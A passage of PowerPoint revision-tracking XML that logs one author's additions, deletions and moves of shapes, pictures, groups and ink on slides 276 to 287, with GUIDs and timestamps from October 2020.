          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T12:35:08.046" v="2200" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2735435411" sldId="276"/>
            <ac:spMk id="2" creationId="{FA327C3F-F562-4E4F-85F5-70B825B07186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2:51:34.951" v="2514" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2801355083" sldId="277"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T12:40:29.605" v="2282" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2801355083" sldId="277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7T12:48:10.310" v="2379" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2801355083" sldId="277"/>
            <ac:spMk id="28" creationId="{12DD6823-BAD3-49C9-A57B-A0B04F89F876}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T12:51:34.951" v="2514" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2801355083" sldId="277"/>
            <ac:spMk id="29" creationId="{4EE59C2C-56E3-49F0-9B1E-8DAFB080B2E5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T12:45:25.598" v="2338" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2801355083" sldId="277"/>
            <ac:spMk id="71" creationId="{D2FD5C08-158B-4BFD-A101-CDF7EDC8193B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T12:44:46.841" v="2314" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2801355083" sldId="277"/>
            <ac:spMk id="73" creationId="{F5ACDF27-8721-44AB-B8A0-137A0EBD7873}"/>
          </ac:spMkLst>
        </pc:s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7" creationId="{A42B326E-C40B-4062-8C5F-2B6FD747C069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0" creationId="{13AB5692-3981-43C3-A733-DF84A851B3C4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3" creationId="{02EFBEDF-D6C3-4EE8-808D-013421492292}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="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3" creationId="{0DBD30BE-A95C-4843-BBDC-EB445E31FC77}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add 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24" creationId="{89FA364E-DA6F-430B-A940-22AA033A68DF}"/>
          </ac:picMkLst>
        </pc:pic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4" creationId="{D1004F7B-A808-49AC-887F-BDA3A4863A41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5" creationId="{42F250E4-95AA-4335-8904-FB2C9CD2F34D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6" creationId="{57353EB6-2ABE-4D88-A426-54BEE0643DA7}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T12:45:20.448" v="2337" actId="478"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2801355083" sldId="277"/>
            <ac:inkMk id="48" creationId="{27D28C35-6804-475A-851B-2C62EC2E9C16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177448628" sldId="277"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T12:55:10.198" v="2594" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="702961727" sldId="278"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T12:53:55.062" v="2557" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="702961727" sldId="278"/>
            <ac:spMk id="2" creationId="{0B03D89E-41C9-4AE0-86EB-C29E379F36EB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T12:55:05.405" v="2592" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="702961727" sldId="278"/>
            <ac:spMk id="3" creationId="{7E3F68A7-58C7-4586-8405-0C9FCD44BE4F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T12:52:18.474" v="2516"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="702961727" sldId="278"/>
            <ac:spMk id="4" creationId="{07CB5566-0E50-49CE-A137-C48BCE3B0654}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T12:55:08.286" v="2593" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="702961727" sldId="278"/>
            <ac:spMk id="5" creationId="{2DC09206-FBB9-4464-ACEC-EF096396B1DD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T12:55:10.198" v="2594" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="702961727" sldId="278"/>
            <ac:spMk id="6" creationId="{A2889C60-453B-49C2-9081-645F888C9499}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T12:53:58.141" v="2558"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="702961727" sldId="278"/>
            <ac:spMk id="7" creationId="{4F3AFEA8-51E8-4006-B8BA-CC9D7E1A3484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465139106" sldId="278"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T13:57:45.529" v="4684" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3714673380" sldId="279"/>
        </pc:sldMkLst>
        <pc:spChg chg="del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2" creationId="{F520DE75-61C3-46D1-80CB-F608B874BF2F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add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3" creationId="{65E7F3F9-E740-45BA-BC30-E3406703E415}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T13:57:45.529" v="4684" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3714673380" sldId="279"/>
            <ac:spMk id="4" creationId="{B593662E-2BAA-4A85-BA6F-18F6AF4E47B9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980532375" sldId="279"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod modAnim modShow">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T13:11:14.409" v="3211" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2075122308" sldId="280"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T13:08:41.257" v="3164" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2075122308" sldId="280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813244987" sldId="280"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modAnim modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T13:35:54.241" v="4118" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="367984464" sldId="281"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T13:12:49.192" v="3334" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="367984464" sldId="28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35:54.241" v="4118" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="367984464" sldId="281"/>
            <ac:spMk id="4" creationId="{478AB046-1B68-488D-AE60-8F01F95A10E4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T13:24:08.665" v="3774"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="367984464" sldId="281"/>
            <ac:spMk id="6" creationId="{871B02FB-3845-4112-ADE9-6942005F8627}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T13:12:40.002" v="3308" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="740007207" sldId="281"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T13:12:07.945" v="3307" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="740007207" sldId="281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095876065" sldId="281"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T13:14:46.046" v="3488" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="55743477" sldId="282"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T13:14:12.982" v="3468" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="55743477" sldId="282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3:14:46.046" v="3488" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="55743477" sldId="282"/>
            <ac:spMk id="3" creationId="{BF95E9AD-9D00-4EAA-BD9E-D89393D636B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479954791" sldId="283"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T13:25:20.706" v="3957" actId="404"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3763265745" sldId="283"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T13:25:20.706" v="3957" actId="404"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3763265745" sldId="283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89727238" sldId="284"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T13:50:39.650" v="4490" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3394653921" sldId="284"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T13:25:47.080" v="3982" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3394653921" sldId="28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0:39.650" v="4490" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3394653921" sldId="284"/>
            <ac:spMk id="4" creationId="{478AB046-1B68-488D-AE60-8F01F95A10E4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7:22:13.428" v="5219"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1762856631" sldId="285"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T14:16:51.145" v="5036" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1762856631" sldId="285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5" creationId="{938109F3-762A-4B38-89C6-E6B6638DB5D4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6" creationId="{A03DE48D-3EFD-42C6-8B38-7B3F8509C85B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:22:04.689" v="5216" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1762856631" sldId="285"/>
            <ac:picMk id="3" creationId="{0442E5C7-A5BD-42C9-97F2-5F2147192038}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:21:52.107" v="5212" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1762856631" sldId="285"/>
            <ac:picMk id="4" creationId="{DEFF79F0-113A-44D0-8039-3A79F8A06BB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06075464" sldId="285"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T14:18:01.061" v="5044" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2563132831" sldId="286"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod addAnim delAnim modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:43:59.220" v="5287" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2902405349" sldId="286"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T14:20:12.347" v="5138" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2902405349" sldId="286"/>
            <ac:spMk id="70" creationId="{384D61BC-5624-4F68-9622-C90D085EBC17}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T14:20:45.322" v="5151" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2902405349" sldId="286"/>
            <ac:spMk id="71" creationId="{230E122C-7479-4007-B006-1E557B8496AB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T14:23:33.849" v="5206" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2902405349" sldId="286"/>
            <ac:spMk id="72" creationId="{F6231725-2B37-4C29-9EDD-8D6D44BFA2B2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T14:18:46.252" v="5055" actId="1076"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2902405349" sldId="286"/>
            <ac:grpSpMk id="50" creationId="{266EA2CA-7F64-4B0C-BF6F-621B7DEADAB0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88" creationId="{A06FF425-7092-4682-AC90-B46385051EB8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109" creationId="{2271E70E-D959-42BD-8763-6834E29292C0}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:43:59.220" v="5287" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2902405349" sldId="286"/>
            <ac:inkMk id="51" creationId="{3F0558CE-FF49-4C33-8121-4354B0719471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231827098" sldId="286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8:27:09.678" v="6519" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3154159029" sldId="287"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T14:19:06.991" v="5058" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:spMk id="2" creationId="{EDDFD6AF-FEC5-4E27-81BB-6DF929EEBD7E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:51:40.989" v="5517" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:spMk id="3" creationId="{6C840C51-4284-4F77-896A-E51D9C7AFA36}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:42:25.963" v="5231" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:spMk id="4" creationId="{3A83C5D6-DC05-4E3F-9065-39CE9AC0BADA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:43:11.630" v="5284" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287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7:52:22.963" v="5548" actId="688"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:spMk id="100" creationId="{5C1E05F4-2846-43C6-B2C3-FD3D70BAC1C5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:51:58.015" v="5532" actId="1035"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:spMk id="105" creationId="{B48C6D2F-752C-45EE-99FD-0A62CDFB596D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T18:02:28.444" v="5896" actId="688"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:spMk id="110" creationId="{77271284-1450-415B-B986-0C667EBD95A4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:57:26.668" v="5720" actId="688"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:spMk id="119" creationId="{1A8DDC24-972B-413B-8AFE-E242CAD99DB6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:44:54.730" v="5302"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="12" creationId="{1EAB6C6F-15C0-4C08-8B0F-44C62E2E0451}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:45:02.510" v="5313"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="18" creationId="{24CE9F45-CBC1-4509-BB2E-6562EA501640}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T18:01:31.575" v="5875" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="29" creationId="{9CBA1E95-E128-469B-A0BB-1CB517787D37}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:45:26.840" v="5330"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="34" creationId="{BF944998-948B-4AA7-950E-47F14D8F1AC6}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:45:32.591" v="5340"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="46" creationId="{A89EABA9-C2BE-4C07-9095-6DE01C3FD4E7}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:52:50.141" v="5551"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="56" creationId="{13F9D6CE-27EB-426D-AD15-9D8CB6ECC9FC}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:52:18.787" v="5546" actId="1076"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="59" creationId="{E956D490-2E2A-4F7E-8E41-871270170777}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:26.144" v="5356"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="66" creationId="{5F6F1363-EF07-4554-8A05-8A0ED06F6854}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:46.468" v="5395"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3154159029" sldId="287"/>
            <ac:grpSpMk id="71" creationId="{F9CB4215-68BA-48D1-9A20-B5D24B29A742}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T17:47:38.232" v="5374"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
